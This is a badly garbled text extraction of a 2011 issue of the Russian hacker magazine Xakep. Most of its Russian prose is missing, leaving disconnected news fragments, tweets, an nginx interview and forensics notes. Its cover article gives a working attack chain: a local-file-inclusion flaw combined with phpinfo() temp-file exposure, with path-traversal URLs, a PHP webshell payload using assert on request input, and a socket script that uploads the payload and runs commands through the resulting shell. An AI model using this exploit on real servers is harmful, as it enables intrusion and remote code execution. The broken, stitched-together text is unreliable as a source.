x 12 (155) 2011
IPv6,
NAT'
WWW.XAKEP.RU
12 (155) 2011
: 210 .
024
NGINX
102
++11:
074
FIREFOX
155
-
PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID
PR-
xakep.ru
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)
(xa@real.xakep.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(naumkin@glc.ru)
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
.: (495) 935-7034, : (495) 545-0906
, ,
. ,
,
,
, , ,
.
, : ,
.
, . Eset , ,
. Group-IB
-.
, web- !
(),
: C
web-. ,
web- .
,
. , .
.
, !
. ,
,
.
TECHNOLOGY
(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
(birarova@glc.ru)
( )
(tatarenkova@glc.ru)
(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011
nikitozz, . .
vkontakte.ru/xakep_mag
facebook.com/XakepMagazine
12/155/ 2011
001
HEADER
COVERSTORY
004
020
016
017
018
MEGANEWS
,
hacker tweets
-
Proof-of-concept
024
030
036
PCZONE
042
046
050
Git&GitHub:
5
Clickjacking: , ,
IPv6:
IPv6- ?
054
060
064
068
074
078
082
Easy-Hack
!
demotivators.ru XSS
Firefox
: AdSense
X-Tools
097
102
106
110
088
094
PoC
114
120
OpenBSD 5.0 FreeBSD 9.0
kernel.org, linux.com,
inuxfoundation.org mysql.com
SYN/ACK
124
130
FERRUM
134
136
137
Content
PHP
PHP-
C++11: C++
,
UNIXOID
MALWARE
084
, !
[ engine x ]
,
phpinfo
LFI-
PHP
140
144
8.5
FAQ UNITED
FAQ
+ Bluetooth = SMS
MEGANEWS
SONY
-
15
blekko. blekko
30
.
WP7
IOS ANDROID
Sony
100
PlayStation Network,
.
Sony
Music
8500 .
, ,
Sony. Sony
(,
GeoHot ),
,
. , ,
, 7 10
PlayStation Network, Sony Entertainment Network Sony Online
Entertainment. 60
PSN/SEN 33 SOE. ,
,
- .
.
Sony, 0,1 % .
93 ,
, .
, .
, Sony , . , . :)
MICROSOFT
SECURITY ESSENTIALS
PWS:Win32/Zbot Google
Chrome.
. ,
:).
004
,
. ,
121 .
,
,
. 9 % .
,
iOS Android . -
,
. Apple Google , ,
,
. ,
. , Microsoft
. ,
Windows Phone 7
,
Wi-Fi
,
.
.
Microsoft ,
, .
,
, WP 7.5.
.
Facebook.
ICQ MAIL.RU
Mail.ru
. ,
.
12 /155/ 2011
MEGANEWS
EDIFIER
MICROSOFT -
Microsoft,
,
. ,
Waledac,
Rustock.
Microsoft Kelihos ( Hlux)
4245 .
Kelihos
- . , , DDoS-,
.
Microsoft . Microsoft ,
.
Kelihos 2011 ,
.
-, ,
.
sinkhole-
, . .
: . sinkholing
.
. Microsoft
, .
.
VeriSign.
, . ,
? , sinkholing
, -
. , ,
, , ,
.
Edifier
MP17
:
235 67 40 .
-
.
Edifier AudioCandy 2
(MP17) . . , USB- FM-,
, SD
,
( USB-). 17 .
2,4 RMS!
, . Edifier MP17
AUX.
,
FM-. 1300 . Edifier MP17
.
,
IPHONE 4S
.
, GPS .
, .
006
12 /155/ 2011
07
MEGANEWS
, DRM .
?
, !
Vigilant Defender.
Vigilant Defender , -
Deus Ex: Human Revolution .
, ,
. ,
, ,
.
. , , . , 24 %
, , 25 % ,
.
, ,
. , , ,
$3040 ( ,
Deus Ex: Human Revolution $60).
,
DRM .
eBay!
, ,
.
.
eBay
20. ,
(NATS). , .
,
. ,
,
.
,
.
.
NATS ,
,
. ,
.
-, .
008
900
. Deus
Ex: Human Revolution
.
, PAYPAL
.
, . , . PayPal
,
,
2,4 3,4 % .
.
12 /155/ 2011
12 /155/ 2011
09
MEGANEWS
FACEBOOK . .
RIW-2011
,
:
RIW
-.
, . ,
ESET,
. ,
,
.
, ,
Group-IB .
2011
. , , , Digital Security.
-
,
.
, CEO- Hint Solutions.
-
WikiLeaks.
. ,
Positive Technologies
, -
.
RIW-2011.
,
, RIW 2011 .
,
.
- RIW-2011,
: . !
- RIW 2011,
:
, ,
,
,
,
,
.
HEADHANTER.RU IT-
71 %
-
, 18 %
, 8 % .
010
12 /155/ 2011
7
Buffalo's Backup Utility
Windows. ,
Time Machine,
MAC OS X.
Buffalo MiniStation
Plus
1
.
,
.
USB
,
: ,
, .
:
USB.
RAMDISK
TurboPC
TurboCopy
USB 3.0
.
12 /155/ 2011
USB 3.0
AES
256 .
SecureLockMobile.
RAMDISK Buffalo
. ,
,
.
.
011
MEGANEWS
,
.
, , , . ,
Predator Reaper,
. , , , ,
.
, .
. ,
,
. , , . ,
,
- . , ,
,
- Mafia Wars :).
, 27 100 Chrome
.
50
50 .
012
Belgacom
Telenet
11 ,
The Pirate Bay.
3D-
,
3D- (
) .
. ,
,
. Roland DG, ,
3D- iModela
$977 ( 3D- ). ,
, , ,
, , ,
. . ,
, , ,
.
, , ,
.
RUNA CAPITAL 3
- NGINX,
. 43
.
LibreOffice
Apple
iOS Google Android.
12 /155/ 2011
() LTE.
C3PO-r2d2-POE
.
. :)
Chaos
Computer Club ()
. , ,
-. , , , ,
.
. ,
, , ,
.
,
,
. , CCC, ,
.
IE 9
-
, Microsoft.
92% URL-
8% .
12 /155/ 2011
PHOTOSHOP
deblurring
. !
:).
1,5%
78,5%,
.
, , .
,
,
. , ? ! .
20-
.
BSL ( 82 84 ) Lineage 2.
BSL, ,
. , ,
,
.
, , , .
,
.
,
, .
,
, . ,
. -, ,
- ...
FACEBOOK .
. ACE,
Webscense.
, ,
, .
013
MEGANEWS
SPYEYE
DART
GOOGLE
SpyEye
SMS
,
.
Trusteer ,
SpyEye . ,
:
SMS ,
- . MitB-
, -,
, . ,
- , ,
. :
SpyEye
.
,
, .
,
, . ,
, SIM-.
, ,
.
GPS- . ,
5%- .
014
,
Dart (dartlang.
org).
,
, -
. JavaScript. , Dart
JavaScript,
.
, , BSD. Dart
. ,
.
, Web Inspector
Dart Harmony -. ,
Dart ,
,
.
, Dart
JavaScript.
Dart
Dart. Google
Dart Chrome, ,
Google Chrome OS.
:
, .
,
.
,
.
. Dart
, , .
.
, Dart
Google. 2006 Google Web Toolkit, - Java.
, , Adwords Google Wave.
Google Web Toolkit .
Dart, Google...
Dart , , . Dart
, , Google
.
12 /155/ 2011
CHROME
GOOGLE
,
, Google ,
.
, , Chrome. , Chrome
Remote Desktop, -.
Windows, Mac OS Linux,
Chrome-. Chrome Remote Desktop
- Chrome.
IT-, , .
(
) .
- , .
Google , -,
, .
, Google hrome , -.
WebRTC (Real Time
Communications),
- . Google , WebRTC
-
, . ,
. , WebRTC
Opera Mozilla. ,
Google Mozilla Opera,
.
, WebRTC. Google
, Chrome.
, WebRTC ,
: iSAC iLBC
, Google
V8. chromium.org ,
PARKER INGENUITY
,
12 /155/ 2011
, Google eamViewer
P2P-
libjingle, UDP TCP
Google.
PseudoTcp libjingle,
. SSL-.
protobuf (Protocol Buffers).
. Parker
Ingenuity
Parker 5TH Technology;
,
. Parker
Ingenuity :
, .
,
,
.
015
HEADER
,
?
, ,
,
. .
- -,
Loggly, Splunk - .
. ,
,
syslog/syslog-ng, . ,
-,
. -. -, . -,
. , , :
- - .
standalone- Loggly, ,
Graylog (www.graylog2.org/about),
,
MongoBD . ,
Logreplica (dklab.ru/
lib/dklab_logreplica). , .
?
: Logreplica
SSH ,
. , ,
,
, ,
.
.
. :
syslog/syslog-ng?, Logreplica
. ,
.
# ,
destination = /var/log/cluster
# ( )
skip_destination_prefixes = /var/log:/var/lib/pgsql/data/logs
#
scoreboard = /var/run/dklab_logreplica.scoreboard
delay = 0.25
#
user = root
# -,
#
[files]
/var/log/{messages,maillog}
/var/log/httpd/*_log
# ,
[hosts]
first=machine1.example.com
second=nobody@machine2.example.com
. - dklab_logreplica.
init /etc/init.d . /etc/init.d/dklab_logreplica start,
logreplica .
?
, (www.denwer.ru),
PHP ( logreplica
Perl). z
?
, -
(
).
-, .
, (
ssh-keygen -t rsa) ,
(ssh-copy-id root@machine-to-be-pulled). Logreplica
(/etc/dklab_logreplica.conf),
, -,
:
016
Logreplica GitHub
12 /155/ 2011
(@asintsov)
00000000
#hacker tweets
@FishermansEnemy:
@jmj:
CISSP,
Metasploit.
Facebook,
. .
@StackSmashing:
@DidierStevens:
free(pDennisRitchie);
pDennisRitchie = NULL; // :-(
-2147483647
Integer.
.
,
,
Lisp .
@XakepRU:
: live.
xakep.ru/blog/Hack/2147.html.
:
@0x6D6172696F:
.
.
bit.ly/rIbsue.
:
,
,
Chrome,
(
Google).
cross-origin policy!
, ,
, ;).
@yandex:
:
$5000
.
, web-
. ,
.
@stamparm:
Google
'"</title><script src" urchin.js'
, (!) ASP(.
NET)/MSSQL SQLi #fact
:
-. , , SQLi. ,
:).
@0xcharlie:
,
NMFB, ,
Syscan Infiltrate. ,
= .
:
NMFB NoMoreFreeBugs
. ,
.
.
@mikko:
, ,
IE6 F-Secure? :
W32/IE6.a, ...
@samikoivu:
2008
Java. Java,
.
@ConanOBrien:
,
, .
Angry Birds, Angry
Birds Rio Angry Birds Seasons.
@VUPEN:
. ,
, .
@BreakiingNews:
75%
: 1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 - ,
...
@0xcharlie:
,
:
Secunia
.
... #nomorefreebugs
12 /155/ 2011
@BillGates:
, ,
.
.
017
HEADER
Proof-of-Concept
,
.
,
.
PoC
.
, ,
Tcpcrypt (tcpcrypt.org), TCP
.
?
. Tcpcrypt
. ,
:
.
- ,
. Tcpcrypt TCP.
, .
.
Tcpcrypt,
, ,
.
?
(github.com/
sorbo/tcpcrypt), . ,
(Windows, Mac
OS X, Linux, FreeBSD).
:
(4500 ) userland (7000 LoC).
,
netsf.inf. , , Tcpcrypt.
nix-
: ,
tcpcrypt : -
, TCP
018
.
.
?
79%
Tcpcrypt :). ,
.
(Internet
Draft), ,
( : bit.
ly/tyvGxs). ,
,
?
( ,
NAT), ,
. ,
Tcpcrypt
- (
VPN-). , (
36 SSL).
, .
Tcpcrypt? ,
MITM-. z
SSL 82 TCP.
tcpcrypt TCP !
12 /155/ 2011
!
GROUP-IB,
,
.
GROUP-IB.
Group-IB
,
. ,
.
NUX
I
L
:
:
11
20
3
:
Group-IB . .
. .
2 2011
()
,
,
.
USB Flash,
,
dd (raw).
,
,
,
,
.
11
3 20
x.
nu
Li
1.
?
,
?
2.
?
?
:
?
,
?
?
?
.
.
contest@group-ib.ru
.
DVD
!
!
COVER STORY
, , Group-IB
, !
, DDoS,
,
-
.
,
. ,
.
,
,
,
.
,
,
, ,
.
, ,
.
()
. ,
,
,
.
,
, ,
. .
1)
, . , ,
. ,
020
, ,
.
2)
,
,
.
.
3)
. , DLP
. DLP-
.
.
4)
,
-. ,
.
.
,
, ,
.
1) , , , :
,
.
.
.
, ,
( , IPS,
DLP), ,
12 /155/ 2011
IP- 8.8.8.8,
,
1 25 2011
.
2241 19
2000 .
() . .
Caine - Computer Aided INvestigative Environment
.
-,
.
,
.
.
2) , , ,
:
, ,
, ,
,
.
,
.
,
.
.
Linux:
Caine (http://www.caine-live.net/),
RipLinux (http://rip.7bf.de/current/).
, CD\DVD
USB-, .
livecd ,
.
.
- , ,
. ( )
DC3DD. (
)
Access Data FTK Imager (http://
accessdata.com/support/adownloads),
. ,
,
.
-
( , ) ,
.
,
.
,
.
12 /155/ 2011
,
,
,
.
,
.
. ,
.
,
,
. ,
, :
, ;
021
COVER STORY
,
;
(, );
, .
:
,
. .,
12345.
(), DVD, USB-,
SDHC.
Seagate, 3750330NS,
AAABBB123.
\Users\\Documents\ 1 8
.txt.
QIP 2010,
6221, ,
.
, :
(, , );
(, );
;
,
.
, , Group-IB
,
:
\COMP1\HDD1\IE USB-, ADATA, 1234.
, :
;
, -,
- . ;
, ,
.
!
:
.doc,
653 .
MicroSDHC,
Transcend, 16 ,
1234 567.
-
Internet Explorer .
,
.
(, -),
, , ,
,
.
,
:
, DLP
, .
DLP, ,
.
.
.
, , .
,
,
,
.
RIP Linux
022
12 /155/ 2011
: DDOS
,
:
, -
- .
-.
- ,
.
-
(), ,
.
,
510
.
.
,
.
.
. ,
, .
,
, ,
:),
.
,
:
1)
.
2)
.
3) ,
. z
SONY , ,
12 /155/ 2011
:
,
:
,
,
, , ( ).
.
.
( ),
, .
,
,
,
.
023
COVER
STORY
&&&&&
[engine x
024
12 /155/ 2011
nginx
, ,
,
?
. ,
( ) -,
18 . 1987
,
,
-,
.
-226,
- .
, -86,
,
.
:
, Yamaha
( MSX). , , I.
, - .
NGINX
,
?
AV,
19891990 .
,
- 100 .
,
,
: ,
, ,
. ,
.
,
. :
,
. -
, 1992-
, .
1994 ,
,
.
7 ,
2000 .
NASDAQ, -,
. -
XXL.RU, ,
,
13 2000
.
.
1994
, .
,
200 0
, .
11
2002
nginx,
web-
. 45
.
2011 $3.000.000
Nginx , inc. .
12 /155/ 2011
025
025
COVER STORY
Q
.
. ,
,
, ,
,
Apache. , mod_gzip
,
mod_deflate, Apache 1.3.
mod_proxy. ,
,
- .
mod_accel
Apache .
2001 .
,
?
, . Mod_deflate
,
, .
, , ,
. 2001
-, Apache.
,
, .
, , ,
, , .
Apache , .
:
Apache
, .
nginx Apache
. , ,
nginx .
Apache: ,
,
. ,
- ,
.
- , , :
, ?
nginx . ,
- 2002 nginx.
? ?
2003
, , , nginx
.
026
Rate.ee,
. , ,
. nginx
mamba.ru zvuki.ru,
MP3.
2004
foto.rambler.ru, , , nginx
,
.
, , ,
, , . ,
, . - 2004
, foto.rambler.ru
nginx.
4 2004 ,
, : 0.1.0.
NGINX
,
?
.
. nginx
. nginx
,
.
, , nginx,
, , .
,
.
.
,
, ,
?
. ,
.
, nginx
,
,
, . nginx, ,
. -,
,
, -,
.
, LIGHTTPD
, .
-,
nginx
. nginx
. ,
nginx
nginx. , nginx
-.
lighttpd (lighty). -
, nginx, .
(Jan Kneschke).
,
, , .
, ,
.
, lighttpd
FastCGI. 20002001
, , Apache: PHP, Perl, Python.
lighttpd
PHP- , FastCGI.
lighttpd FastCGI . 2000 :
, FastCGI?
mod_php, .
NGINX ?
. nginx
-
- HTTP FastCGI
WSGI.
Apache , nginx
,
FastCGI.
, ,
nginx, Apache.
:
nginx , .
,
?
, ,
Apache nginx? ,
, . Apache
,
- , ,
mod_php. ,
PHP 100
, ,
, 100 .
: 10
,
, -
.
100
, , 80 / (10 /).
, 10
. ,
12 /155/ 2011
nginx
, Apache PHP
1020 .
, , Apache
, ,
.
,
. nginx
Apache, :
nginx
, Apache,
,
.
nginx ,
- ,
,
(
Apache,
. . .).
- , ,
nginx
nginx
,
.
,
,
, - .
Apache, nginx
! .
, ,
, .
, -,
,
. , nginx
.
, , ,
. ?
, , :
- Apache . ,
nginx, Apache.
FastCGI PHP WSGI Python.
, WordPress.com nginx
, -
LiteSpeed.
nginx,
PHP FastCGI.
nginx ,
, MP3, FLV-, MPEG4-, .
.
NGINX -
?
12 /155/ 2011
, ,
, .
,
.
, ?
- ,
. ,
. ,
, ,
. ,
- Debian/Ubuntu,
,
, ,
. ?
, , .
ALSR?
, . .
, . , ,
, ,
, , .
nginx ,
, , .
, ,
. ,
, nginx ,
malloc.
, -
,
. nginx . ,
, . , ,
, .
Security-advisory ,
. ,
, . ,
, ,
? ,
- .
Q
, ?
, .
.
.
. :
, .
. .
,
. :
, -
,
, . , ,
,
. ,
, . :
nginx , ,
,
. ,
.
,
NGINX,
INC. ,
.
. , ,
2008-
, , .
,
. -
nginx, . ,
.
, -
,
,
. ,
,
nginx. ,
: ,
,
.
- . ,
, - ,
.
, Parallels Runa
Capital.
, .
, ?
,
, .
,
, ,
, .
, , ,
, , -,
,
, ,
- , . ,
, :
-, -. . ,
, .
027
027
COVER STORY
:
NGINX.
?
.
?
, . ,
, ,
.
,
,
.
, : .
, ,
BSD,
.
nginx ,
.
, nginx
, Rate.ee zvuki.ru.
NGINX?
A ,
. , .
,
, ,
, .
.
Linux-:
CentOS, Ubuntu.
, , .
: ,
, ,
.
.
.
,
,
.
,
, ,
, ,
. ,
.
,
, :).
,
,
, ?
028
, ,
, ,
, ,
: .
, ,
.
,
! , -
:
-
.
, , .
- ,
.
-, :
, , .
! ,
- -?
?
nginx
.
-, , ,
,
-, ,
-
. , nginx
, ,
.
, : , ,
. ,
.
opensource-,
,
- , - ,
, .
, opensource. ,
, . ,
,
.
,
.
,
. ,
opensource-
.
, , ,
, ,
,
nginx.
. ,
- : ,
! - -.
?
,
,
. . .
,
. , , ,
-
, - ,
.
, : ,
. ,
open source, ,
/ . sponsored development.
,
nginx: ,
, , , , CDN-.
.
, ,
, ?
, ,
.
,
, ,
.
, .
,
,
, .
,
,
, ,
?
, ,
, ,
,
- . ,
,
- .
,
. . z
12 /155/ 2011
nginx
- nginx,
. , ,
, -, .
nginx.
Nginx
.
HTTP keep-alive
.
-
(Netcraft, 2011):
-
nginx
100
000 000
80 000
000
43 000
000
-0.38%
,
nginx
-.
-0.07%
+0.51%
2002
2004
2011
1.0
nginx
2011 nginx
:
.
12 /155/ 2011
Rate.ee
,
nginx.
nginx
:
$3
nginx
87 912
.
70+
.
nginx hiring!
8
nginx
security advisories.
3
nginx
029
COVER STORY
R_T_T
,
.
,
. ,
,
,
.
030
12 /155/ 2011
,
Intel
( 2007 )
,
SMP-.
,
, ,
1. AMD
12 /155/ 2011
,
.
,
, .
,
. , ,
,
, .
, ,
.
,
.
.
( 4060 ),
- , ,
.
,
,
( , Intel
). .
, ,
, .
, , -
, .
,
,
.
,
,
.
,
, .
,
.
, ,
- .
,
, , .
,
Intel
.
-
031
031
COVER STORY
86.
,
,
.
.
, - , , - .
,
,
- .
,
.
,
, ( )
.
, , ,
.
, ,
,
Intel
,
:
, , -
,
,
Intel. , -
? : Assembled
Canada, Assembled China.
, -
2. Intel
032
,
,
. , ,
, ,
.
:
, .
,
, , ,
, .
, Intel
. ,
5000, . ,
631xESB/632xESB I/O Controller Hub,
- , 2007
. ,
. ,
-:
,
,
.
()
.
, - ,
.
, , , -
, , ,
, : , .
Intel ,
,
( IPMI,
)
,
.
, - ,
, .
.
,
:
ARC4 processor working at 62.5 MHz speed.
Interface to both LAN ports of Intel
631xESB/632xESB I/O Controller Hub allowing
direct connection to the net and access to all LAN
registers.
Cryptographic module, supporting AES and
RC4 encryption algorithms and SHA1 and MD5
authentication algorithms.
Secured mechanism for loadable Regulated FW.
40
, ! Intel
256 .
,
,
.
,
Intel, 5000,
. , , ,
(
,
).
,
, -
,
,
.
, ,
-
, .
,
.
12 /155/ 2011
, Intel
,
.
.
:
Intel
5000 , - ,
.
-
Intel ,
,
.
- ,
-
, , , , ,
.
-
Intel,
, . ,
.
, ,
, ,
.
,
?
,
. ,
,
60 , .
, , ,
, . , ,
,
- IP-.
? , -
,
, -
12 /155/ 2011
.3
.
, ,
, ,
,
.
.
Intel AMD ,
, ,
. ,
, .
.
,
,
.
,
.
VMCB (VMCS), ,
0,40,7 .
Intel ,
,
.
.
Intel AMD
.
. AMD , .
AMD
VMRUN ( , ).
VMCB- AMD
,
VMRUN VMCB- .
,
AMD .
Intel
. VMCB- VMREAD VMLOAD,
.
,
VMCB-,
.
, , .
,
,
. , ,
. Intel
, , ,
VMCB (. 2).
,
SMM- ( ),
, , VMB-,
,
,
,
.
, Intel, ,
, ,
. ,
,
.
: , -
.
033
033
COVER STORY
,
. .
,
. , -
.
,
,
. , : ,
.
,
.
, Intel
.
,
, 7,
11- ,
( - ). , 11
, VMCB-
.
,
.
11-
,
,
, .
, ,
-
.
, , , 11-
.
,
!
, -
,
,
.
, . , ,
,
-
.
- , ,
.
,
.
, ,
Intel, , ,
, .
- .
, . , ,
.
-,
.
, .
. ,
, , .
,
.
USB-, ,
,
.
(. 3).
, ,
,
.
(. . 4).
- ,
Intel, ,
.
. Intel. ,
.
,
, .
.
. , ,
Intel , .
, ,
.
, ,
.
. 4.
034
03
0
3
34
12
2 /155/
/1
155
15
155/
55/
5
5/ 20
2
201
2011
01
0
11
.
,
.
, .
, , ,
,
. ,
,
,
.
,
, ,
.
, ,
. ,
. .
,
, .
, ,
, ,
,
.
, , ,
,
.
,
,
. ,
,
.
,
. ,
,
.
, , ,
, ,
.
,
-
, ,
-?
,
?
12
12 //155/
155// 201
155/
155
15
2
20
2011
01
0
11
,
, .
, .
,
( , ). ,
,
, ,
. 86, , ,
. , ,
, .
, ,
.
.
,
:
. - ,
.
-, -,
,
.
,
. ,
,
.
-
,
. ,
,
, , ,
,
, .
, ,
.
, : /
.
/
.
!
20
.
:
.
DOC-
.
,
,
.
,
( ,
) .
. ,
,
,
.
,
.
.
.
,
, .
, ,
. , ,
, .
,
, , .
, ,
.
, ,
, -
. ?
. ,
. ,
, , ,
, .
,
.
,
.
, , ,
. ,
, -. , , , , ,
.
, . ,
, , , ,
, . z
035
35
5
COVER STORY
phpinfo
LFI-
PHP
LFI
phpinfo()
.
.
WWW
php.net
PHP;
bit.ly/neygaA
LFI;
bit.ly/ccFHcY
phpinfo() ;
bit.ly/pmkMVP
LFI phpinfo()
RDot;
bit.ly/YP9LE
BWMeter;
bit.ly/eS4GxW
Procmon.
WARNING
. ,
,
036
INFO
DVD
phpinfo()
10% .
PERL PHP,
.
, ,
local file include, ,
. . , .
,
, . LFI,
.
. -: , - local file inclusion...
php.ini - , ?
, - , ! LFI- ,
,
.
LFI:
1. (, , . .).
(,
).
2. (/apache/logs/error.log, /var/log/access_log, /proc/
self/environ, /proc/self/cmdline, /proc/self/fd/X ).
, ,
. PHP CGI
/proc, .
3. (data:, php://input, php://filter),
allow_url_include=On ( Off) PHP >= 5.2.
4. (/tmp/sess_*, /var/lib/php/session/). ,
.
5. . CMS www-,
( , /var/spool/
mail).
12 /155/ 2011
phpinfo
tmp-
, LFI
(/tmp/php*, C:\tmp\php*). /
:
LFI-;
phpinfo();
- Windows (
);
PHP > 5.2.0.
( , - ,
):
1. PHP- php- phpinfo(), PHP (tmp) .
2. phpinfo()
seed ( ) .
3.
(, Content-Length),
.
4. tmp- LFI.
PHP- tmp-
PHPINFO()
phpinfo().
, php.ini
, .
:
1. upload_tmp_dir , PHP . (NULL),
Environment.TEMP.
2. file_uploads
upload_tmp_dir (
On).
3. upload_max_filesize .
(
10 ), 2 .
4. max_execution_time .
0, ,
, . :-)
5. session.serialize_handler . php
( ).
, phpinfo()
PHP, PHP Version 5.3.8.
PHP $_FILES
. . , :
(
RFC1867):
1. .
2. - PHP.
3. PHP tmp- .
4. .
6. PHP- .
7. PHP -.
8. PHP cleanup ( ) .
9. - , .
http://site.com/css.php?file=style.css
http://site.com/css.php?file=../../(..)/etc/passwd
, css.php:
<?php
// {..} - ,
// {..}
if (!isset($_GET['file']) OR
!file_exists('./tpl/default/'.$_GET['file']))
die('404 Not Found');
// {..} , -
//
include './tpl/default/'.$_GET['file'];
?>
, ,
,
. *nix Windows:
http://site.com/css.php?file=../../../../../etc/passwd
http://site.com/css.php?file=../../../../../tmp/
http://site.com/css.php?file=../../../../..\Windows\Temp\
12 /155/ 2011
3, 4, 5, 6, 7 tmp- ,
8 . PHP-
$_FILES,
move_uploaded_file(). ,
PHP
, ,
. , PHP
, cleanup.
, ,
, ,
. ,
PHP- ( ob_* ob_start, ob_flush ), , 8 9,
.
037
COVER STORY
DOS LFI + PHPINFO()
_FILES, ,
. .
, - ?
? .
. ,
30
, ,
. ,
.
(
+ ).
. ,
. .
DoS-
file_upload php.ini.
,
. phpinfo(),
tmp- , ,
LFI , PHP cleanup.
, , .
, PHP ?
PHP
,
LFI , PHP. PHP
! , . , . , , .
, . :) :
Content-Length (
);
(,
------------8WvJNM).
, :
1. .
2. ( ).
3. ,
.
2 ,
PHP . , , ,
, ,
.
TMP-
,
.
phpinfo() .
(phpinfo.php, info.php, i.php . .), Grey eLwaux
( ). ,
. . PHP Variables phpinfo()
038
PHPINFO()
PHP- phpinfo()
, .
,
.
, ,
phpinfo():
1. , / PHP, ;
2. document_root ,
;
3. error_log ( LFI);
4. safe_mode (default OFF) ;
5. open_basedir (default empty) ,
PHP;
6. allow_url_fopen (default ON) URL
;
7. allow_url_include (default OFF) ;
8. magic_quotes_gpc (default OFF)
;
9. register_globals (default OFF) ;
10. disable_functions (default empty)
;
11. max_execution_time (default 0)
;
12. display_errors (default OFF) ;
13. upload_tmp_dir tmp-.
14. (curl, sockets, zip . .);
15. : _GET, _POST, _COOKIE,
_FILES, _SERVER.
GET- : http://site.com/
phpinfo.php?a[]=111. PHP _FILES _GET ( ,
var_dump). , ,
tmp-. tmp-
upload_tmp_dir php.ini. *nix /tmp, C:\Windows\Temp. 99 % PHP
. (bit.ly/
raWpwS), Windows , PHP
GetTempFileName,
:
12 /155/ 2011
phpinfo
(!) .
<path>\<pre><uuuu>.TMP
--<path> = C:\Windows\Temp ( upload_tmp_dir
php.ini),
<pre> = php (session.serialize_handler),
<uuuu> = .
, Windows <uuuu>
, :
php1A3E.tmp
php1A3F.tmp
php1A40.tmp
*nix
mkstemp (linux.die.net/man/3/mkstemp):
<path>/<pre><rand>
<path> = /tmp,
<pre> = php (session.serialize_handler),
<rand> = (seed += XXX ^ PID)
XXX glibc
:
- XXX = time()
- XXX = gettimeofday().sec << 32 | gettimeofday().usec
- XXX = rdtsc
, ,
: /tmp/phpXXXXXX, XXXXXX
[A-Za-z0-9]:
/tmp/php6Dekf9
/tmp/phpK1uuk5
/tmp/phpdnJ82P
, *nix Windows
. , -
WINDOWS
,
:
1. phpinfo().
2. , phpinfo()
_FILES[tmp_name] .
3. phpinfo()
<?php
assert(stripslashes($_REQUEST["e"]));
?>
, Content-Length
. .
4. ,
, (. 1) (
LFI).
5. tmp-, .
6. 2- , .
, phpinfo() win-
. phpinfo() ,
. Windows 61440 .
*nix- :
1. phpinfo() HTTP- c PHP-
.
2. -
- (, BWMeter),
.
3. , phpinfo().
4. ! [tmp_name] - ( ,
), /
.
phpinfo() - ,
,
.
phpinfo.php
, ,
,
:
http://site.com/css.php?file=../../htdocs/public_html/
phpinfo.php
PHP,
12 /155/ 2011
039
COVER STORY
, . ,
, , PHP-.
, phpinfo() ,
.
1000000*36 ,
.
. ,
Microsoft-IIS/7.5 PHP/5.3.8.
Windows- css.php LFI:
<?php
$file = './uploads/'.$_GET['f'];
if ( file_exists($file) ) {include $file; die; }
die('File not found!');
?>
phpinfo.php:
<?php
phpinfo();
?>
, tmp-:
<?php
assert(stripslashes($_REQUEST["e"]));
?>
PHP- POST-
PHP-:
// Evil
$file="-----------------------------XaXbXaXbXaXbXa\r\n";
$file.="Content-Disposition: form-data; name=file".rand(0,100).";
filename=\r\nfile".rand(0,100).".txt\r\n";
$file.="Content-Type: text/plain\r\n\r\n";
$file.="<?php assert(stripslashes(\$_REQUEST[\"e\"]));?>\r\n";
$file.="-----------------------------XaXbXaXbXaXbXa\r\n";
$post = $file;
$req ="POST ".$target." HTTP/1.0\r\n";
$req.="Host: ".$host."\r\n";
$req.="Content-Type: multipart/form-data;
boundary=---------------------------XaXbXaXbXaXbXa\r\n";
$req.="Content-Length: ".strlen($post)."\r\n";
$req.="Connection: Close\r\n\r\n";
$req.= $post;
:
$tmp = '';
$html = '';
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, 80);
socket_write($sock, $req);
while ($out = socket_read($sock, 65536))
{
$html .= $out;
if(preg_match_all('#=>(.*)#',$html,$r) &&
!empty($r[0][2]))
{
040
$tmp_hex seed .
. . ContentLength ( , ):
$req = substr($req,0,strlen($req)-2);
retname($host,$req);
.
, .
$tmp_hex +1 LFI. ? ,
. , PHP, ,
-
, .
. +2,
+3 . . , , , tmp-,
1 100.
LFI . -:
ttp://site.com/css.php?file=../../../tmp/
php7xEkH3&e=system('dir')
:
php expl.php step4 ../../../tmp/php7xEkH3.tmp
http://site.com/s.txt
here your shell: http://site.com/8149.php
expl.php , .
,
phpinfo() . , PHP Live,
magic_quotes=on ./super . Windows-
, nix*- BWMeter
. , - PHP
-
. , . z
12 /155/ 2011
Preview
32 .
.
PC ZONE
50
IPV6: HOWTO
IPv4 .
.
IPv6! ,
.
IP .
:
, .
.
/ ?
NAT IPv4.
IPv6,
,
.
PC ZONE
46
- , ? clickjacking.
68
:
.
.
102
,
, -
C++11
C++.
12 /155/ 2011
MALWARE
88
,
, , ,
, HIPS.
UNIXOID
106
Google
,
. .
120
kernel.org,linux.com,
linuxfoundation.org mysql.com.
?
041
PC ZONE
Git&GitHub:
5
,
version1, version2, version2a,
.
,
.
, hello
world,
.
15 ,
,
Git!
GIT?
Git ,
, Linux.
: , .
Git'
. : Git ,
.
, , , -
.
, , , ,
, ,
IDE.
. .
Git
, , , .
Linux git
. Mac', ,
git-osx-installer. Windows
,
( ).
Git
Windows, , , .
Git .
GitGUI, Git, IDE git, , ,
.
Git .
commit. . commit , ( ).
:
git config --global user.name "Your Name"
git config --global user.email "your@email.com"
, :
git config --global color.diff auto
git config --global color.status auto
git config --global color.branch auto
042
12 /155/ 2011
Git&GitHub:
commit
git config, ,
.
. .
, ,
(, , ,
).
